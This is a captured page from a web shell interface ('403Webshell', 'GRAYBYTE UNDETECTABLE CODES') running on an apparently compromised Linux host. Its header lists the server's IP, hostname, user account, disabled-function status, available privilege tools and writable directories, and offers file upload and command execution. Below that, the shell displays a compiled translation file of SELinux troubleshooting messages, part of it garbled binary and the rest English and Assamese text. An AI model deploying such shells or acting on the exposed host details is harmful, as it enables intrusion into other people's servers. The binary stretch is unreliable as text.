- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 3.143.3.114
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/locale/as/LC_MESSAGES/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/locale/as/LC_MESSAGES/setroubleshoot-plugins.mo
��x���(
�)
1VHg�h
|p
(�

�$t�I3~}��,�/�.bF����h�F S�!P&"Nw"N�"G#]]#O�#k$Rw$q�$f<%V�%V�%SQ&j�&B'TS'^�'�(t�(?>)Z~)Y�)�3*X�,-,.?/	U0
_1m2zy3��3��4�I5��53�6e�6_R7e�7f88��8�]9�:��:\^<b�<\=+{=c�=7><C>:�>�>�>4�>?,+?X??t?0�?1�?]@2u@K�@2�@]'Ac�A�A,�A&Bd9BN�B�B_C]eCE�C-	D7D4PD!�D'�D$�D �D_ERuEO�E9F:RF�F��F7GBRGA�G^�Gs6H��H�AI�K�Mu�O�"P��P��QkR%�T\Y�nZ~@[�]1�^�`��b�he@Fj[�m�o��u�zz�~��~}�������!�����c��(�̓������l�����y��U����w��F��,�	�����[�
,��7�L/�f|�i�ZM�b��\�-h�{���4+�$`�������������O�;��V��	��\�bd�\Ǹ+$�zP��˹Sk����Fl�P��b�<g�u��C��^�^�_S����cK����aM�$��C��Z(���������:���������c��U
��`�c��PO�}��b�����F��������,�b���)�q�����%����0�����VS_ZIN9:jx6.@gBY]F>JEvs4T5 KlfHhQ'cWk0i^
*[1oPUrMRpXe")t<=$;	qC
73a(,A2m+&w\-8dbu!D#LO%nG`/?
	dac_override and dac_read_search capabilities usually indicates that the root process does not have access to a file based on the permission flags.  This usually mean you have some file with the wrong ownership/permissions on it.
    

    SELinux denied access requested by $SOURCE. It is not
    expected that this access is required by $SOURCE and this access
    may signal an intrusion attempt. It is also possible that the specific
    version or configuration of the application is causing it to require
    additional access.

    
    Attempt restorecon -v '$TARGET_PATH' or chcon -t SIMILAR_TYPE '$TARGET_PATH'
    
    Changing the "$BOOLEAN" boolean to true will allow this access:
    "setsebool -P $BOOLEAN=1"
    
    Changing the "$BOOLEAN" boolean to true will allow this access:
    "setsebool -P $BOOLEAN=1."
    
    Changing the "allow_ftpd_use_nfs" boolean to true will allow this access:
    "setsebool -P allow_ftpd_use_nfs=1."
    
    Changing the file_context to mnt_t will allow mount to mount the file system:
    "chcon -t mnt_t '$TARGET_PATH'."
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t mnt_t '$FIX_TARGET_PATH'"
    
    If httpd scripts should be allowed to write to public directories you need to turn on the $BOOLEAN boolean and change the file context of the public directory to public_content_rw_t.  Read the httpd_selinux
    man page for further information:
    "setsebool -P $BOOLEAN=1; chcon -t public_content_rw_t <path>"
    You must also change the default file context labeling files on the system in order to preserve public directory labeling even on a full relabel.  "semanage fcontext -a -t public_content_rw_t <path>"
    
    If you want $SOURCE to continue, you must turn on the
    $BOOLEAN boolean.  Note: This boolean will affect all applications
    on the system.
    
    If you want httpd to send mail you need to turn on the
    $BOOLEAN boolean: "setsebool -P
    $BOOLEAN=1"
    
    If you want to allow $SOURCE to bind to port $PORT_NUMBER, you can execute 

    # semanage port -a -t PORT_TYPE -p %s $PORT_NUMBER
    
where PORT_TYPE is one of the following: %s.

    

If this system is running as an NIS Client, turning on the allow_ypbind boolean may fix the problem.  setsebool -P allow_ypbind=1.
    
    If you want to allow $SOURCE to connect to $PORT_NUMBER, you can execute 

    # sandbox -X -t sandbox_net_t $SOURCE
    
    If you want to allow $SOURCE to connect to $PORT_NUMBER, you can execute 

    # semanage port -a -t PORT_TYPE -p %s $PORT_NUMBER

    where PORT_TYPE is one of the following: %s.
    
    If you want to change the file context of $TARGET_PATH so that the automounter can execute it you can execute "chcon -t bin_t $TARGET_PATH".  If you want this to survive a relabel, you need to permanently change the file context: execute  "semanage fcontext -a -t bin_t '$FIX_TARGET_PATH'".
    
    SELinux denied access requested by $SOURCE. It is not
    expected that this access is required by $SOURCE and this access
    may signal an intrusion attempt. It is also possible that the specific
    version or configuration of the application is causing it to require
    additional access.
    
    SELinux denied access requested by the $SOURCE command. It looks like this is either a leaked descriptor or $SOURCE output was redirected to a file it is not allowed to access.  Leaks usually can be ignored since SELinux is just closing the leak and reporting the error.  The application does not use the descriptor, so it will run properly.  If this is a redirection, you will not get output in the $TARGET_PATH.  You should generate a bugzilla on selinux-policy, and it will get routed to the appropriate package.  You can safely ignore this avc.
    
    SELinux denied access to $TARGET_PATH requested by $SOURCE.
    $TARGET_PATH has a context used for sharing by a different program. If you
    would like to share $TARGET_PATH from $SOURCE also, you need to
    change its file context to public_content_t.  If you did not intend to
    allow this access, this could signal an intrusion attempt.
    
    SELinux denied cvs access to $TARGET_PATH.
    If this is a CVS repository it needs to have a file context label of
    cvs_data_t. If you did not intend to use $TARGET_PATH as a CVS repository
    it could indicate either a bug or it could signal an intrusion attempt.
    
    SELinux denied xen access to $TARGET_PATH.
    If this is a XEN image, it has to have a file context label of
    xen_image_t. The system is setup to label image files in directory /var/lib/xen/images
    correctly.  We recommend that you copy your image file to /var/lib/xen/images.
    If you really want to have your xen image files in the current directory, you can relabel $TARGET_PATH to be xen_image_t using chcon.  You also need to execute semanage fcontext -a -t xen_image_t '$FIX_TARGET_PATH' to add this
    new path to the system defaults. If you did not intend to use $TARGET_PATH as a xen
    image it could indicate either a bug or an intrusion attempt.
    
    SELinux has denied the $SOURCE access to potentially
    mislabeled files $TARGET_PATH.  This means that SELinux will not
    allow httpd to use these files. If httpd should be allowed this access to these files you should change the file context to one of the following types, %s.
    Many third party apps install html files
    in directories that SELinux policy cannot predict.  These directories
    have to be labeled with a file context which httpd can access.
    
    SELinux has denied the $SOURCE_PATH from executing potentially
    mislabeled files $TARGET_PATH.  Automounter can be setup to execute
    configuration files. If $TARGET_PATH is an automount executable
    configuration file it needs to have a file label of bin_t.
    If automounter is trying to execute something that it is not supposed to, this could indicate an intrusion attempt.
    
    SELinux has prevented vbetool from performing an unsafe memory operation.
    
    SELinux has prevented wine from performing an unsafe memory operation.
    
    SELinux is preventing $SOURCE_PATH "$ACCESS" access on $TARGET_PATH.
    
    SELinux is preventing $SOURCE_PATH "$ACCESS" access to $TARGET_PATH.
    
    SELinux is preventing $SOURCE_PATH "$ACCESS" to $TARGET_PATH.
    
    SELinux is preventing $SOURCE_PATH access to a leaked $TARGET_PATH file descriptor.
    
    SELinux is preventing $SOURCE_PATH from binding to port $PORT_NUMBER.
    
    SELinux is preventing $SOURCE_PATH from changing the access
    protection of memory on the heap.
    
    SELinux is preventing $SOURCE_PATH from connecting to port $PORT_NUMBER.
    
    SELinux is preventing $SOURCE_PATH from creating a file with a context of $SOURCE_TYPE on a filesystem.
    
    SELinux is preventing $SOURCE_PATH from loading $TARGET_PATH which requires text relocation.
    
    SELinux is preventing $SOURCE_PATH from making the program stack executable.
    
    SELinux is preventing Samba ($SOURCE_PATH) "$ACCESS" access to $TARGET_PATH.
    
    SELinux is preventing cvs ($SOURCE_PATH) "$ACCESS" access to $TARGET_PATH
    
    SELinux is preventing the $SOURCE_PATH from executing potentially mislabeled files $TARGET_PATH.
    
    SELinux is preventing the http daemon from sending mail.
    
    SELinux is preventing xen ($SOURCE_PATH) "$ACCESS" access to $TARGET_PATH.
    
    SELinux policy is preventing an httpd script from writing to a public
    directory.
    
    SELinux policy is preventing an httpd script from writing to a public
    directory.  If httpd is not setup to write to public directories, this
    could signal an intrusion attempt.
    
    SELinux prevented $SOURCE from mounting on the file or directory
    "$TARGET_PATH" (type "$TARGET_TYPE").
    
    SELinux prevented httpd $ACCESS access to http files.
    
    SELinux prevented the ftp daemon from $ACCESS files stored on a CIFS filesystem.
    
    SELinux prevented the ftp daemon from $ACCESS files stored on a NFS filesystem.
    
    The $SOURCE application attempted to change the access protection of memory on
    the heap (e.g., allocated using malloc).  This is a potential security
    problem.  Applications should not be doing this. Applications are
    sometimes coded incorrectly and request this permission.  The
    <a href="http://people.redhat.com/drepper/selinux-mem.html">SELinux Memory Protection Tests</a>
    web page explains how to remove this requirement.  If $SOURCE does not work and
    you need it to work, you can configure SELinux temporarily to allow
    this access until the application is fixed. Please file a bug
    report against this package.
    
    Use a command like "cp -p" to preserve all permissions except SELinux context.
    
    You can alter the file context by executing chcon -R -t rsync_data_t '$TARGET_PATH'
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t rsync_data_t '$FIX_TARGET_PATH'"
    
    You can alter the file context by executing chcon -R -t samba_share_t '$TARGET_PATH'
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t samba_share_t '$FIX_TARGET_PATH'"
    
    You can alter the file context by executing chcon -t public_content_t '$TARGET_PATH'
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t public_content_t '$FIX_TARGET_PATH'"
    
    You can alter the file context by executing chcon -t swapfile_t '$TARGET_PATH'
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t swapfile_t '$FIX_TARGET_PATH'"
    
    You can alter the file context by executing chcon -t virt_image_t '$TARGET_PATH'
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t virt_image_t '$FIX_TARGET_PATH'"
    
    You can alter the file context by executing chcon -t xen_image_t '$TARGET_PATH'
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t xen_image_t '$FIX_TARGET_PATH'"
    
    You can execute the following command as root to relabel your
    computer system: "touch /.autorelabel; reboot"
    
    You can generate a local policy module to allow this
    access - see <a href="http://docs.fedoraproject.org/selinux-faq-fc5/#id2961385">FAQ</a>

    Please file a bug report.
    
    You can generate a local policy module to allow this
    access - see <a href="http://docs.fedoraproject.org/selinux-faq-fc5/#id2961385">FAQ</a>
    
    You can restore the default system context to this file by executing the
    restorecon command.  restorecon '$SOURCE_PATH'.
    
    You can restore the default system context to this file by executing the
    restorecon command.  restorecon '$TARGET_PATH', if this file is a directory,
    you can recursively restore using restorecon -R '$TARGET_PATH'.
    
    Your system may be seriously compromised!
    
    Your system may be seriously compromised! $SOURCE_PATH attempted to mmap low kernel memory.
    
    Your system may be seriously compromised! $SOURCE_PATH tried to load a kernel module.
    
    Your system may be seriously compromised! $SOURCE_PATH tried to modify SELinux enforcement.
    
    Your system may be seriously compromised! $SOURCE_PATH tried to modify kernel configuration.
    
Disable IPV6 properly.
    
Either remove the mozplluger package by executing 'yum remove mozplugger'
Or turn off enforcement of SELinux over the Firefox plugins.
setsebool -P unconfined_mozilla_plugin_transition 0
    
If you decide to continue to run the program in question you will need
to allow this operation.  This can be done on the command line by
executing:

# setsebool -P mmap_low_allowed 1

You tried to place a type on a %s that is not a file type.  This is not allowed, you must assigne a file type.  You can list all file types using the seinfo command.

seinfo -afile_type -x

     Changing the "$BOOLEAN" and
    "$WRITE_BOOLEAN" booleans to true will allow this access:
    "setsebool -P $BOOLEAN=1 $WRITE_BOOLEAN=1".
    warning: setting the "$WRITE_BOOLEAN" boolean to true will
    allow the ftp daemon to write to all public content (files and
    directories with type public_content_t) in addition to writing to
    files and directories on CIFS filesystems.  # semanage fcontext -a -t SIMILAR_TYPE '$FIX_TARGET_PATH'
# restorecon -v '$FIX_TARGET_PATH'# semanage fcontext -a -t samba_share_t '$FIX_TARGET_PATH%s'
# restorecon %s -v '$FIX_TARGET_PATH'# semanage fcontext -a -t virt_image_t '$FIX_TARGET_PATH'
# restorecon -v '$FIX_TARGET_PATH'# semanage port -a -t %s -p %s $PORT_NUMBER# semanage port -a -t PORT_TYPE -p %s $PORT_NUMBER
    where PORT_TYPE is one of the following: %s.A process might be attempting to hack into your system.Add 
net.ipv6.conf.all.disable_ipv6 = 1
to /etc/sysctl.conf
Contact your security administrator and report this issue.Restore
ContextRestore ContextSELinux is preventing $SOURCE_PATH "$ACCESS" access.Turn off memory protectionYou can read '%s' man page for more details.You might have been hacked.You must tell SELinux about this by enabling the '%s' boolean.
You need to change the label on $FIX_TARGET_PATHYou need to change the label on $TARGET_BASE_PATHYou need to change the label on $TARGET_BASE_PATH to public_content_t or public_content_rw_t.You need to change the label on $TARGET_BASE_PATH'You need to change the label on $TARGET_PATH to a type of a similar device.You need to change the label on '$FIX_TARGET_PATH'You should report this as a bug.
You can generate a local policy module to allow this access.You should report this as a bug.  
You can generate a local policy module to dontaudit this access.execstack -c %sif you think that you might have been hackedsetsebool -P %s %sturn on full auditing to get path information about the offending file and generate the error again.use a command like "cp -p" to preserve all permissions except SELinux context.you can run restorecon.you may be under attack by a hacker, since confined applications should never need this access.you may be under attack by a hacker, since confined applications should not need this access.you may be under attack by a hacker, this is a very dangerous access.you must change the labeling on $TARGET_PATH.you must fix the labels.you must move the cert file to the ~/.cert directoryyou must pick a valid file label.you must remove the mozplugger package.you must setup SELinux to allow thisyou must tell SELinux about thisyou must tell SELinux about this by enabling the 'httpd_unified' and 'http_enable_cgi' booleansyou must tell SELinux about this by enabling the vbetool_mmap_zero_ignore boolean.you must tell SELinux about this by enabling the wine_mmap_zero_ignore boolean.you must turn off SELinux controls on the Chrome plugins.you must turn off SELinux controls on the Firefox plugins.you need to add labels to it.you need to change the label on $TARGET_PATH to public_content_rw_t, and potentially turn on the allow_httpd_sys_script_anon_write boolean.you need to fully relabel.you need to report a bug. 
This is a potentially dangerous access.you need to report a bug. This is a potentially dangerous access.you need to set /proc/sys/net/ipv6/conf/all/disable_ipv6 to 1 and do not blacklist the module'you need to use a different command. You are not allowed to preserve the SELinux context on the target file system.you should clear the execstack flag and see if $SOURCE_PATH works correctly.
Report this as a bug on %s.
You can clear the exestack flag by executing:Project-Id-Version: PACKAGE VERSION
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2021-09-07 17:26+0200
PO-Revision-Date: 2017-08-31 08:31-0400
Last-Translator: Copied by Zanata <copied-by-zanata@zanata.org>
Language-Team: Assamese (http://www.transifex.com/projects/p/fedora/language/as/)
Language: as
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Plural-Forms: nplurals=2; plural=(n != 1);
X-Generator: Zanata 4.6.2

	dac_override আৰু dac_read_search ক্ষমতাসমূহে সাধাৰণত ইংগিত দিয়ে যে ৰুট প্ৰক্ৰিয়াৰ অনুমতি ফ্লেগসমূহৰ উপৰত নিৰ্ভৰ কৰি এটা ফাইললে অভিগম নাই।  ই সাধাৰণত বুজায় আপোনাৰ ভূল অধিকাৰত্ব/অনুমতি থকা কিছুমান ফাইল আছে।
    

    SELinux এ $SOURCE দ্বাৰা অনুৰোধ কৰা অভিগম নাকচ কৰিলে। এই অভিগম
    $SOURCE দ্বাৰা প্ৰয়োজন হব বুলি আশা কৰা হোৱা নাই আৰু এই সংকেতে এটা
    অনাধিকাৰ প্ৰৱেশৰ ইংগিত দিব পাৰে। সম্ভব হব পাৰে
    যে এপ্লিকেচনৰ বিশেষ সংস্কৰণ অথবা সংৰূপে ইয়াৰ অতিৰিক্ত অভিগমৰ
    প্ৰয়োজনীয়তা দেখাই আছে।

    
    restorecon -v '$TARGET_PATH' অথবা chcon -t SIMILAR_TYPE '$TARGET_PATH' চেষ্টা কৰক
    
    "$BOOLEAN" বুলিয়ানক true লে সলনি কৰিলে এই অভিগমৰ অনুমতি পোৱা যাব:
    "setsebool -P $BOOLEAN=1"
    
    "$BOOLEAN" বুলিয়ানক true লে সলনি কৰিলে এই অভিগমৰ অনুমতি পোৱা যাব:
    "setsebool -P $BOOLEAN=1।"
    
    "$allow_ftpd_use_nfs" বুলিয়ানক true লে সলনি কৰিলে এই অভিগমৰ অনুমতি পোৱা যাব:
    "setsebool -P allow_ftpd_use_nfs=1।"
    
    file_context ক mnt_t লে সলনি কৰিলে ফাইল চিস্টেম মাউন্ট কৰিবলে মাউন্টৰ অনুমতি দিব:
    "chcon -t mnt_t '$TARGET_PATH'।"
    আপুনি লগতে চিস্টেমত অবিকল্পিত ফাইল পৰিপ্ৰেক্ষতিত ফাইলসমূহ সলনি কৰিব লাগিব যাতে সিহতক এটা সম্পূৰ্ণ পুনৰলেবেলত সংৰক্ষৰণ কৰিব পাৰি।  "semanage fcontext -a -t mnt_t '$FIX_TARGET_PATH'"
    
    যদি httpd স্ক্ৰিপ্টসমূহক ৰাজহুৱা ডাইৰেকটৰিসমূহলে লিখাৰ অনুমতি দিব লাগে আপুনি $BOOLEAN বুলিয়ান অন কৰিব লাগিব আৰু ৰাজহুৱা ডাইৰেকটৰিৰ ফাইল পৰিপ্ৰেক্ষতিতক public_content_rw_t লে সলনি কৰিব লাগিব। অধিক তথ্যৰ বাবে httpd_selinux
    man পৃষ্ঠা পঢ়ক:
    "setsebool -P $BOOLEAN=1; chcon -t public_content_rw_t <path>"
    এটা সম্পূৰ্ণ পুনৰলেবেলত ৰাজহুৱা ডাইৰেকটৰি সংৰক্ষণ কৰিবলে আপুনি চিস্টেমত অবিকল্পিত ফাইল পৰিপ্ৰেক্ষতিত লেবেল থকা ফাইলসমূহ সলনি কৰিব লাগিব। "semanage fcontext -a -t public_content_rw_t <path>"
    
    যদি আপুনি $SOURCE ক চলাব বিচাৰে, আপুনি
    $BOOLEAN বুলিয়ান অন কৰিব লাগিব।  মন কৰিব: এই বুলিয়ানে চিস্টেমৰ সকলো এপ্লিকেচনৰ
    উপৰত প্ৰভাৱ পেলাব।
    
    যদি আপুনি httpd মেইল প্ৰেৰণ কৰাব বিচাৰে আপুনি
    $BOOLEAN boolean: "setsebool -P
    $BOOLEAN=1" অন কৰিব লাগিব
    
    যদি আপুনি $SOURCE ক পোৰ্ট $PORT_NUMBER লে সংযোগ কৰাৰ অনুমতি দিব বিচাৰে, আপুনি 

    # semanage port -a -t PORT_TYPE -p %s $PORT_NUMBER এক্সিকিউট কৰিব পাৰিব
    
যত PORT_TYPE হল নিম্নলিখিতৰ এটা: %s.

    

যদি এই চিস্টেম এটা NIS ক্লাএন্ট হিচাপে চলি আছে, allow_ypbind বুলিয়ানক অন কৰিলে সমস্যা ঠিক হব পাৰে। setsebool -P allow_ypbind=1।
    
    যদি আপুনি $SOURCE ক $PORT_NUMBER ৰ সৈতে সংযোগ কৰাৰ অনুমতি দিব বিচাৰে, আপুনি এক্সিকিউট কৰিব পাৰিব 

    # sandbox -X -t sandbox_net_t $SOURCE
    
    যদি আপুনি $SOURCE ক $PORT_NUMBER লে সংযোগ কৰাব বিচাৰে, আপুনি প্ৰেৰণ কৰিব পাৰে 

    # semanage port -a -t PORT_TYPE -p %s $PORT_NUMBER

    যত PORT_TYPE নিম্নলিখিতৰ এটা: %s.
    
    যদি আপুনি $TARGET_PATH ৰ ফাইল পৰিপ্ৰেক্ষতিত সলনি কৰিব বিচাৰে যাতে স্বমাউন্টাৰে ইয়াক এক্সিকিউট কৰিব পাৰে আপুনি "chcon -t bin_t $TARGET_PATH" এক্সিকিউট কৰিব পাৰিব। যদি আপুনি ইয়াক এটা পুনৰলেবেল পৰা বচাব বিচাৰিছে, আপুনি স্থায়ীভাৱে ফাইল পৰিপ্ৰেক্ষতিত: execute  "semanage fcontext -a -t bin_t '$FIX_TARGET_PATH'" সলনি কৰিব লাগিব।
    
    SELinux এ $SOURCE দ্বাৰা অনুৰোধ কৰা অভিগম নাকচ কৰিলে। এই অভিগম
    $SOURCE দ্বাৰা প্ৰয়োজন হব বুলি আশা কৰা হোৱা নাই আৰু এই সংকেতে এটা
    অনাধিকাৰ প্ৰৱেশৰ ইংগিত দিব পাৰে। সম্ভব হব পাৰে
    যে এপ্লিকেচনৰ বিশেষ সংস্কৰণ অথবা সংৰূপে ইয়াৰ অতিৰিক্ত অভিগমৰ
    প্ৰয়োজনীয়তা দেখাই আছে।
    
    SELinux এ $SOURCE কমান্ড দ্বাৰা অনুৰোধ কৰা অভিগম নাকচ কৰিলে। এনে লাগিছে যেন ই হয় এটা উৰুখ বিৱৰক অথবা $SOURCE আউটপুটক এনে এটা ফাইললে পুনৰনিৰ্দেশ কৰা হৈছে যলৈ তাৰ অভিগমৰ অনুমতি নাই।  উৰুখসমূহ সাধাৰণত উপেক্ষা কৰিব পাৰি যিহেতু SELinux এ উৰুখ বন্ধ কৰি ত্ৰুটিৰ সংবাদ দি আছে।  এপ্লিকেচনে বিৱৰক ব্যৱহাৰ নকৰে, সেয়েহে ই সঠিকভাৱে চলিব।  যদি ই এটা পুনৰনিৰ্দেশ হয়, আপুনি $TARGET_PATH ত আউটপুট নাপাব।  আপুনি selinux-policy ত এটা bugzilla সৃজন কৰিব লাগিব, আৰু ই সঠিক পেকেইজ লৈকে দিশ পাব। আপুনি avc ক সুৰক্ষিতভাৱে উপেক্ষা কৰিব পাৰিব।
    
    SELinux এ $SOURCE দ্বাৰা অনুৰোধ কৰা $TARGET_PATH নাকচ কৰিলে।
    $TARGET_PATH ৰ এটা পৃথক প্ৰগ্ৰাম দ্বাৰা অংশীদাৰী কৰিবলে ব্যৱহৃত এটা পৰিপ্ৰেক্ষতিত আছে।
    যদি আপুনি $SOURCE ৰ পৰা $TARGET_PATH অংশীদাৰী কৰিব বিচাৰে, আপুনি ইয়াৰ
    ফাইল পৰিপ্ৰেক্ষতিত public_content_t লে সলনি কৰিব লাগিব।  যদি আপুনি এই অভিগমৰ অনুমতি
    দিব নিবিচাৰে, ই এটা অনাধিকাৰ প্ৰৱেশৰ ইংগিত দিব পাৰে।
    
    SELinux এ $TARGET_PATH লে cvs অভিগম নাকচ কৰিলে।
    যদি ই এটা CVS ভঁৰাল হয় ইয়াৰ এটা ফাইল পৰিপ্ৰেক্ষতিত লেবেল
    cvs_data_t থাকিব লাগিব। যদি আপুনি $TARGET_PATH ক এটা CVS ভঁৰাল হিচাপে
    ব্যৱহাৰ কৰিব নিবিচাৰে ই এটা বাগ হব পাৰে অথবা ই এটা অনাধিকাৰ প্ৰৱেশৰ ইংগিত হব পাৰে।
    
    SELinux এ $TARGET_PATH লে xen অভিগম নাকচ কৰিলে।
    যদি ই এটা XEN ছবি হয়, ইয়াৰ এটা xen_image_t ফাইল পৰিপ্ৰেক্ষতিত
    লেবেল থাকিব লাগিব। চিস্টেম ডাইৰেকটৰি /var/lib/xen/images ত ছবি ফাইলসমূহ
    সঠিকভাৱে লেবেল কৰিবলে সংস্থাপিত। আমি উপদেশ দিও যে আপুনি আপোনাৰ ছবি ফাইলক /var/lib/xen/images ছবিত কপি কৰক।
    যদি আপুনি সঁচাকৈ আপোনাৰ xen ছবি ফাইলসমূহক বৰ্তমান ডাইৰেকটৰিত বিচাৰে, আপুনি chcon ব্যৱহাৰ কৰি $TARGET_PATH ক xen_image_t হিচাপে পুনৰ লেবেল কৰিব পাৰিব।  আপুনি লগতে এই নতুন পথক চিস্টেম অবিকল্পিত যোগ কৰিবলে semanage fcontext -a -t xen_image_t '$FIX_TARGET_PATH' এক্সিকিউট
    কৰিব লাগিব। যদি আপুনি $TARGET_PATH ক এটা xen
    ছবি হিচাপে ব্যৱহাৰ কৰিম বুলি ভবা নাই ই এটা বাগ অথবা এটা অনাধিকাৰ প্ৰৱেশৰ ইংগিত দিব পাৰে।
    
    SELinux এ বিভৱীয়ভাৱে ভুল লেবেল কৰা ফাইলসমূহ $TARGET_PATH লে
    $SOURCE অভিগম নাকচ কৰিছে। ই বুজায় যে SELinux এ
    httpd ক এই ফাইলসমূহ ব্যৱহাৰ কৰাৰ অনুমতি নিদিব। যদি httpd ক এই ফাইলসমূহলে অভিগম দিব লাগে আপুনি ফাইল পৰিপ্ৰেক্ষতিতক নিম্নলিখিত ধৰণসমূহৰ এটালে, %s সলনি কৰিব লাগিব।
    বহুতো তৃতিয় দল এপ্লিকেচনসমূহে ডাইৰেকটৰিসমূহত html ফাইলসমূহ ইনস্টল কৰে
    যাক SELinux নিতিয়ে আগতিয়াকৈ কব নোৱাৰে। এই ডাইৰেকটৰিসমূহক
    এটা ফাইল পৰিপ্ৰেতিতৰ সহায়ত লেবেল কৰিব লাগিব যাক httpd এ অভিগম কৰিব পাৰে।
    
    SELinux এ $SOURCE_PATH ক বিভৱীয়ভাৱে ভুল ধৰণে লেবেল কৰা
    ফাইলসমূহ $TARGET_PATH এক্সিকিউট কৰা নাকচ কৰিছে। স্বমাউন্টাৰক
    সংৰূপ ফাইলসমূহ এক্সিকিউট কৰিবলে সংস্থাপন কৰিব পাৰি। যদি $TARGET_PATH
     এটা স্বমাউন্ট এক্সিকিউটেবুল সংৰূপ ফাইল ইয়াৰ bin_t লেবেল থাকিব লাগিব।
    যদি স্বমাউন্টাৰে এক্সিকিউট কৰিব নলগা কিবাক এক্সিকিউট কৰাৰ চেষ্টা কৰি আছে, ই এটা অনাধিকাৰ প্ৰৱেশৰ ইংগিত দিব পাৰে।
    
    SELinux এ vbetool ক এটা অসুৰক্ষিত মেমৰি কাৰ্য্য পৰিৱেশন কৰাৰ পৰা প্ৰতিৰোধ কৰিছে।
    
    SELinux এ wine ক এটা অসুৰক্ষিত মেমৰি কাৰ্য্য পৰিৱেশন কৰাৰ পৰা প্ৰতিৰোধ কৰিছে।
    
    SELinux এ $TARGET_PATH ত $SOURCE_PATH "$ACCESS" অভিগম প্ৰতিৰোধ কৰি আছে।
    
    SELinux এ $TARGET_PATH লে $SOURCE_PATH "$ACCESS" অভিগম প্ৰতিৰোধ কৰি আছে।
    
    SELinux এ $TARGET_PATH লে $SOURCE_PATH "$ACCESS" অভিগম প্ৰতিৰোধ কৰি আছে।
    
    SELinux এ এটা $TARGET_PATH ফাইল বিৱৰকলে $SOURCE_PATH অভিগম প্ৰতিৰোধ কৰি আছে।
    
    SELinux এ $SOURCE_PATH ক পোৰ্ট $PORT_NUMBER লগত সংযোগ কৰাৰ পৰা প্ৰতিৰোধ কৰি আছে।
    
    SELinux এ $SOURCE_PATH ক হিপত মেমৰিৰ অভিগম সুৰক্ষা
    সলনি কৰাৰ পৰা প্ৰতিৰোধ কৰি আছে।
    
    SELinux এ $SOURCE_PATH ক পোৰ্ট $PORT_NUMBER লগত সংযোগ কৰাৰ পৰা প্ৰতিৰোধ কৰি আছে।
    
    SELinux এ $SOURCE_PATH ক এটা ফাইলচিস্টেমত $SOURCE_TYPE ৰ এটা পৰিপ্ৰেক্ষতিতৰ সৈতে এটা ফাইল সৃষ্টি কৰাৰ পৰা প্ৰতিৰোধ কৰি আছে।
    
    SELinux এ $SOURCE_PATH ক $TARGET_PATH ল'ড কৰাৰ পৰা প্ৰতিৰোধ কৰি আছে যাৰ পাঠ আবন্টনৰ প্ৰয়োজন।
    
    SELinux এ $SOURCE_PATH ক প্ৰগ্ৰাম স্টেকক এক্সিকিউটেবুল কৰাৰ পৰা প্ৰতিৰোধ কৰি আছে।
    
    SELinux এ $TARGET_PATH লে Samba ($SOURCE_PATH) "$ACCESS" অভিগম প্ৰতিৰোধ কৰি আছে।
    
    SELinux এ $TARGET_PATH লে cvs ($SOURCE_PATH) "$ACCESS" অভিগম প্ৰতিৰোধ কৰি আছে
    
    SELinux এ $SOURCE_PATH ক বিভৱীয়ভাৱে ভুললেবেল ফাইল $TARGET_PATH এক্সিকিউট কৰাৰ পৰা প্ৰতিৰোধ কৰি আছে।
    
    SELinux এ http ডিমনক মেইল এক্সিকিউট কৰাৰ পৰা প্ৰতিৰোধ কৰি আছে।
    
    SELinux এ $TARGET_PATH লে xen ($SOURCE_PATH) "$ACCESS" অভিগম প্ৰতিৰোধ কৰি আছে।
    
SELinux নীতিয়ে এটা httpd লিপিক এটা ৰাজহুৱা ডাইৰেকটৰিলে লিখাৰ পৰা প্ৰতিৰোধ কৰি আছে।


    
SELinux নীতিয়ে এটা httpd লিপিক এটা ৰাজহুৱা ডাইৰেকটৰিলে লিখাৰ পৰা

প্ৰতিৰোধ কৰি আছে।  যদি httpd ক ৰাজহুৱা ডাইৰেকটৰিলে লিখাৰ বাবে সংহত কৰা হোৱা নাই, ই

এটা অনাধিকাৰ প্ৰৱেশৰ চেষ্টা ইংগিত কৰিব পাৰে।

    
    SELinux এ $SOURCE ক ফাইল অথবা ডাইৰেকটৰিত মাউন্ট কৰাৰ পৰা প্ৰতিৰোধ কৰিছিল
    "$TARGET_PATH" (type "$TARGET_TYPE")।
    
    SELinux http ফাইলসমূহলে httpd $ACCESS অভিগম প্ৰতিৰোধ কৰিলে।
    
    SELinux এ ftp ডিমনক এটা CIFS ফাইলচিস্টেমত সংৰক্ষিত ফাইলসমূহ $ACCESS ৰ পৰা প্ৰতিৰোধ কৰিলে।
    
    SELinux এ ftp ডিমনক এটা NFS ফাইলচিস্টেমত সংৰক্ষিত ফাইলসমূহ $ACCESS ৰ পৰা প্ৰতিৰোধ কৰিলে।
    
    $SOURCE এপ্লিকেচনে হিপত মেমৰিৰ অভিগম সুৰক্ষা পৰিৱৰ্তন কৰাৰ চেষ্টা কৰিছে
    (উদাহৰণস্বৰূপ, malloc ব্যৱহাৰ কৰি আবন্টিত)।  ই এটা বিভৱীয় সুৰক্ষা
    সমস্যা।  এপ্লিকেচনসমূহে এনে কৰিব নালাগে। এপ্লিকেচনসমূহ
    কেতিয়াবা ভূলভাৱে ক'ড কৰা থাকে আৰু এই অনুমতি অনুৰোধ কৰে।
    <a href="http://people.redhat.com/drepper/selinux-mem.html">SELinux মেমৰি সুৰক্ষা পৰিক্ষাসমূহ</a>
